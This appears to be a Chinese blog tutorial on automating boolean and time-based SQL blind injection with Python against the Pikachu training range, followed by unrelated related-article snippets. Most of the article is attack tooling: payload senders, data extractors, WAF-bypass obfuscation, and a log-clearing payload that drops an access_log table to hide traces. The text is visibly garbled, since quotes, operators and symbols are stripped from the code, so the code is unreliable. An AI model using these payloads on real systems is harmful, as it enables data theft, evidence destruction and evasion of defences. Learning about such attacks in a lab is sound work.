当前位置: 首页 > article >正文

从Pikachu靶场实战出发:用Python脚本自动化搞定SQL盲注(布尔/时间)

从Pikachu靶场实战出发用Python脚本自动化搞定SQL盲注布尔/时间在渗透测试的世界里SQL盲注就像一场与数据库的无声对话——你看不到错误信息只能通过微妙的真假响应或时间延迟来推断数据。Pikachu靶场作为经典的Web安全训练平台其布尔和时间盲注关卡完美模拟了这种盲人摸象的场景。本文将带你用Python的requests库打造自动化探测工具让原本需要数小时的手工猜解变成几分钟的自动化流程。1. 盲注自动化核心原理拆解1.1 布尔盲注的二进制思维布尔盲注的本质是通过True/False响应来推断数据。假设我们要猜解数据库名长度传统手工方式需要反复尝试# 手工猜解示例伪代码 if exists in response: print(长度5) else: print(长度5)自动化脚本采用二分查找算法能大幅提升效率。以下是时间复杂度对比方法猜解范围1-20猜解范围1-100线性遍历20次100次二分查找5次7次1.2 时间盲注的时钟把戏当页面响应不随查询条件变化时时间盲注通过人为制造延迟来传递信息。关键点在于# 时间盲注检测逻辑 start_time time.time() response requests.get(url, timeout3) if time.time() - start_time 2.5: print(条件为真)注意网络抖动可能导致误判建议设置阈值时保留至少30%余量2. 实战脚本开发从零构建自动化工具2.1 基础请求框架搭建首先封装通用的HTTP请求模块import requests from urllib.parse import quote class BlindSQLi: def __init__(self, target_url): self.url target_url self.session requests.Session() self.headers { User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64), Accept: text/html,application/xhtmlxml } def send_payload(self, payload, methodGET, timeout5): try: if method GET: return self.session.get( f{self.url}?id{quote(payload)}, headersself.headers, timeouttimeout ) else: return self.session.post( self.url, data{input: payload}, headersself.headers, timeouttimeout ) except requests.exceptions.Timeout: return None2.2 布尔盲注自动化实现基于二分的数据库名猜解器def bool_binary_search(self, query_template, max_len30): # 确定长度 low, high 1, max_len while low high: mid (low high) // 2 payload query_template.format(conditionflength(database()){mid}) if self.check_condition(payload): low mid 1 else: high mid - 1 db_length low # 逐字符猜解 result for i in range(1, db_length 1): for char in abcdefghijklmnopqrstuvwxyz_: payload query_template.format( conditionfsubstr(database(),{i},1){char} ) if self.check_condition(payload): result char break return result2.3 时间盲注的异步优化同步请求会线性增加检测时间改用异步IO提升效率import asyncio import aiohttp async def time_based_check(url, payload, threshold2): async with aiohttp.ClientSession() as session: start time.time() try: async with session.get(url, params{id: payload}, timeout3) as resp: await resp.text() except asyncio.TimeoutError: return True elapsed time.time() - start return elapsed threshold3. 高级技巧与性能调优3.1 字符集优化策略默认的a-z遍历效率低下通过统计分析优化字符出现频率# 英文数据库常见字符频率降序 COMMON_CHARS [ e, t, a, o, i, n, s, h, r, d, l, c, u, m, w, f, g, y, p, b, v, k, j, x, q, z, _, 0, 1, 2 ]3.2 动态超时调整算法根据网络状况自动校准延迟阈值def calibrate_threshold(self, sample_size5): total 0 for _ in range(sample_size): start time.time() self.send_payload(11) # 无害查询 total time.time() - start return total / sample_size * 1.5 # 50%安全余量4. 防御对抗与实战注意事项4.1 绕过WAF的编码技巧当遇到防火墙拦截时可以尝试十六进制编码SELECT - 0x53454C454354注释混淆SEL/*xxx*/ECT大小写变异SeLeCtdef waf_bypass(payload): return /*!{}*/.format(payload) # MySQL特性注释4.2 日志清理与隐蔽性自动化脚本应包含痕迹清除功能def clear_logs(self): cleanup_payload 1; DROP TABLE IF EXISTS access_log self.send_payload(cleanup_payload)重要仅限授权测试使用未经授权的渗透测试属于违法行为在Pikachu靶场测试时发现时间盲注脚本对网络稳定性极为敏感。通过引入3次重试机制后成功率从72%提升到98%。对于布尔盲注将字符猜解从顺序遍历改为基于英文频率的优先检测平均检测时间缩短了40%。这些优化在真实内网渗透测试中同样有效。

相关文章:

从Pikachu靶场实战出发:用Python脚本自动化搞定SQL盲注(布尔/时间)

从Pikachu靶场实战出发:用Python脚本自动化搞定SQL盲注(布尔/时间) 在渗透测试的世界里,SQL盲注就像一场与数据库的无声对话——你看不到错误信息,只能通过微妙的真假响应或时间延迟来推断数据。Pikachu靶场作为经典的…...

从D3 0_到MSM:RTCM3.2协议帧结构深度解析与实战解码

1. RTCM3.2协议入门:从"D3 0_"开始的导航数据之旅 第一次看到RTCM3.2数据流时,那串以"D3 0_"开头的十六进制代码让我完全摸不着头脑。就像面对一本用外星语言写成的密码本,每个字节都像是在嘲笑我的无知。但当我真正理解…...

告别命令行!用Kafka Tool 2.0.4图形化界面管理Topic和消息的保姆级教程

告别命令行!用Kafka Tool 2.0.4图形化界面管理Topic和消息的保姆级教程 你是否曾在深夜对着黑底白字的Kafka命令行界面抓狂?或是面对kafka-topics.sh和kafka-console-consumer.sh的复杂参数感到迷茫?今天,我们将彻底解放你的双手…...

MAX30102数据飘、读数不准?手把手教你调试与滤波实战(STM32平台)

MAX30102数据飘、读数不准?手把手教你调试与滤波实战(STM32平台) 当你在STM32平台上使用MAX30102进行心率血氧监测时,是否遇到过数据波动大、读数不稳定的问题?这可能是硬件设计、环境干扰或软件处理等多方面因素共同作…...

WarcraftHelper:魔兽争霸3在现代系统上的终极兼容性修复工具

WarcraftHelper:魔兽争霸3在现代系统上的终极兼容性修复工具 【免费下载链接】WarcraftHelper Warcraft III Helper , support 1.20e, 1.24e, 1.26a, 1.27a, 1.27b 项目地址: https://gitcode.com/gh_mirrors/wa/WarcraftHelper 还在为魔兽争霸3在现代电脑上…...

鸿蒙ArkTS性能不够用?试试用Rust写个‘外挂’:手把手教你集成NAPI模块提升计算效率

鸿蒙ArkTS性能优化实战:用Rust打造高性能NAPI模块 ArkTS作为鸿蒙生态的主力开发语言,在UI构建和业务逻辑处理上表现出色,但遇到复杂计算任务时,性能瓶颈往往成为开发者的痛点。本文将带你深入探索如何通过Rust编写NAPI原生模块&am…...

SuperMap GIS处理BIM数据避坑指南:从模型检查到缓存生成的12个常见误区

SuperMap GIS处理BIM数据避坑指南:从模型检查到缓存生成的12个常见误区 在建筑信息模型(BIM)与地理信息系统(GIS)融合应用的实践中,许多工程师都会遇到这样的困惑:明明按照标准流程操作&#xf…...

告别云端:5步在本地用Orthanc搭建轻量级DICOM影像服务器,管理你的CT/MRI数据集

告别云端:5步在本地用Orthanc搭建轻量级DICOM影像服务器,管理你的CT/MRI数据集 医学影像数据的管理一直是临床医生和科研人员面临的挑战。想象一下,当你需要快速调取某个患者的CT序列进行多学科会诊,或是需要批量处理数千张MRI图…...

GLPI安装总报错?这份CentOS 7下的“保姆级”排错指南请收好(附PHP模块、文件权限详解)

GLPI安装总报错?这份CentOS 7下的“保姆级”排错指南请收好(附PHP模块、文件权限详解) 在CentOS 7上部署GLPI时,即使按照教程一步步操作,也常常会遇到各种"坑"。本文将带你深入排查这些常见问题,…...

别再纠结了!FLUENT两相流VOF、Mixture、Eulerian模型到底怎么选?附实战场景对比

FLUENT两相流模型实战指南:VOF、Mixture与Eulerian的精准选择策略 在计算流体动力学(CFD)领域,两相流问题一直是工程师们面临的重要挑战。无论是化工反应器中的气液混合,还是石油管道中的油水分离,亦或是能…...

手把手教你用Skyline健康检查辅助VSAN集群安全关机(附7.0U3新功能解读)

深度解析:如何利用健康检查工具优化VSAN集群安全关机流程 1. 为什么VSAN集群关机需要特殊流程? 虚拟化环境中的存储集群关机从来都不是简单的"点一下关机按钮"就能完成的操作。VSAN作为VMware的软件定义存储解决方案,其分布式特性使…...

RK3588双系统实战:从分区表设计到fstab修改,手把手教你构建Android 12与Linux Debian共存环境

RK3588双系统深度实践:Android 12与Debian的精密共存架构设计 当工业级设备需要同时承载高性能图形交互与稳定后台服务时,RK3588的双系统架构展现出独特价值。想象一下,一台医疗影像终端既能运行Android的触控应用,又能通过Linux …...

告别屏幕偏色!用高通QDCM 6.0 + CA-410为你的安卓设备做一次专业级色彩校准

高通QDCM 6.0与CA-410联袂:解锁安卓设备专业级色彩校准全流程 当你在不同设备上查看同一张照片时,是否发现色彩表现天差地别?专业设计师的作品在手机上显示偏黄,视频创作者的内容在平板上泛青——这些恼人的色差问题,根…...

避坑指南:PyTorch F.interpolate里align_corners参数到底怎么设?附对比图

深度解析PyTorch插值操作:align_corners参数实战指南 在计算机视觉和深度学习领域,张量的空间维度变换是最基础却最容易出错的环节之一。许多开发者在初次接触PyTorch的F.interpolate函数时,往往会被align_corners这个看似简单的布尔参数困扰…...

为什么Adobe GenP 3.0成为创意工作者的数字工具箱钥匙?

为什么Adobe GenP 3.0成为创意工作者的数字工具箱钥匙? 【免费下载链接】Adobe-GenP Adobe CC 2019/2020/2021/2022/2023 GenP Universal Patch 3.0 项目地址: https://gitcode.com/gh_mirrors/ad/Adobe-GenP 在数字创意领域,Adobe Creative Clou…...

别再只调SystemClock_Config!深入HC32F460时钟树,搞懂HRC、XTAL和PLL的切换逻辑

深入HC32F460时钟树:从HRC到PLL的动态切换实战指南 在嵌入式开发中,时钟系统如同芯片的"心跳",决定了整个系统的运行节奏。HC32F460作为一款高性能MCU,其时钟架构设计既灵活又复杂,许多开发者往往止步于复制…...

告别内核打印!用devmem2在嵌入式Linux上直接读写寄存器(附交叉编译踩坑实录)

嵌入式Linux寄存器调试利器:devmem2实战指南与交叉编译全解析 调试嵌入式系统时,最令人头疼的莫过于反复修改内核驱动、重新编译、烧录镜像的漫长循环。想象一下这样的场景:你正在调试一块全新的ARM开发板,GPIO死活不工作&#x…...

告别网盘限速!八大网盘直链下载助手完整使用指南

告别网盘限速!八大网盘直链下载助手完整使用指南 【免费下载链接】Online-disk-direct-link-download-assistant 一个基于 JavaScript 的网盘文件下载地址获取工具。基于【网盘直链下载助手】修改 ,支持 百度网盘 / 阿里云盘 / 中国移动云盘 / 天翼云盘 …...

保姆级教程:不用修改标准表,如何优雅地增强SAP MD11/MD12/MD13屏幕字段?

SAP MD11/MD12/MD13屏幕增强:无侵入式开发的优雅实践 在SAP项目实施过程中,业务需求的变更往往要求对标准事务码进行界面调整,而MD11/MD12/MD13这类核心计划订单事务的屏幕增强尤为常见。传统做法直接修改标准表结构或覆盖标准程序&#xff0…...

Python自动化控制Comsol多物理场仿真的完整指南:MPh库实战解析

Python自动化控制Comsol多物理场仿真的完整指南:MPh库实战解析 【免费下载链接】MPh Pythonic scripting interface for Comsol Multiphysics 项目地址: https://gitcode.com/gh_mirrors/mp/MPh 想要用Python代码自动化控制Comsol多物理场仿真吗?…...

华为AR路由器Console密码忘了别慌,BootROM菜单里这个选项能一键清空(附不同版本默认密码)

华为AR路由器Console密码恢复实战指南:BootROM密码管理功能详解 凌晨三点,机房告警灯突然亮起,核心业务中断。当你火速赶到现场,却发现那台关键华为AR路由器的Console密码怎么输都不对——这种场景恐怕是每位网络工程师的噩梦。别…...

VSCode Clangd插件配置避坑指南:解决Linux内核代码跳转失效和‘bear make’的那些坑

VSCode Clangd插件深度调优:Linux内核开发者的高效导航实战 当你面对数百万行的Linux内核源码时,代码跳转和智能补全不再是奢侈品,而是生产力刚需。作为嵌入式开发老手,我经历过无数次Clangd配置失败后的挫败感——那些看似简单的…...

3分钟快速上手:FigmaCN中文界面插件的终极指南

3分钟快速上手:FigmaCN中文界面插件的终极指南 【免费下载链接】figmaCN 中文 Figma 插件,设计师人工翻译校验 项目地址: https://gitcode.com/gh_mirrors/fi/figmaCN 你是否曾在使用Figma时因为英文界面而感到困扰?面对"Frame&q…...

开源工具douyin-downloader:破解抖音内容保存难题的技术方案与实践指南

开源工具douyin-downloader:破解抖音内容保存难题的技术方案与实践指南 【免费下载链接】douyin-downloader A practical Douyin downloader for both single-item and profile batch downloads, with progress display, retries, SQLite deduplication, and browse…...

AI写专著必备!一键生成20万字专著,AI专著生成工具助你高效写作!

创新是学术专著的关键所在,同时也是写作上的一大挑战。一部优秀的专著,不应该仅仅是对已有研究的汇集,而是必须要有贯穿整本书的独特观点、理论框架或者新的研究方法。在浩如烟海的学术资料面前,挖掘出未被研究的领域并不容易——…...

别再只会load(‘data.mat‘)了!Matlab数据加载的5个隐藏技巧与实战避坑

别再只会load(data.mat)了!Matlab数据加载的5个隐藏技巧与实战避坑 每次看到同事在Matlab里反复输入load(data.mat)时,我都忍不住想冲过去分享几个能节省半小时的冷门技巧。作为从学生时代就被Matlab"折磨"过来的老用户,我踩过的坑…...

如何做好测试?(八)兼容性测试实战:从策略到工具的完整落地指南

1. 兼容性测试的核心价值与挑战 兼容性测试就像给软件做"体检",确保它在各种环境下都能健康运行。想象一下,你开发了一个精美的电商网站,在Chrome上运行完美,结果用户用Safari打开发现购物车按钮消失了——这种问题轻则…...

从CAD转战CREO?这份高效上手攻略帮你快速打通草绘、零件与工程图核心模块

从CAD转战CREO:参数化设计思维与核心模块高效迁移指南 如果你已经熟练使用SolidWorks、AutoCAD或UG/NX等CAD软件,初次接触CREO时可能会感到困惑——为什么绘制一个简单矩形需要先草绘轮廓再标注尺寸?为什么修改模型参数会自动更新所有关联视图…...

Adobe-GenP 3.0:终极Adobe全家桶免费激活完整指南

Adobe-GenP 3.0:终极Adobe全家桶免费激活完整指南 【免费下载链接】Adobe-GenP Adobe CC 2019/2020/2021/2022/2023 GenP Universal Patch 3.0 项目地址: https://gitcode.com/gh_mirrors/ad/Adobe-GenP 想要免费解锁Adobe全家桶软件吗?Adobe-Gen…...

游戏地图加载太慢?试试用Boost库R树做动态对象管理(C++实战)

游戏地图加载太慢?用Boost.Geometry的R树实现高效空间索引(C实战) 在开发大型开放世界游戏时,你是否遇到过这样的场景:当玩家快速移动时,地图加载出现明显卡顿;或是当数百个NPC同时活动时&#…...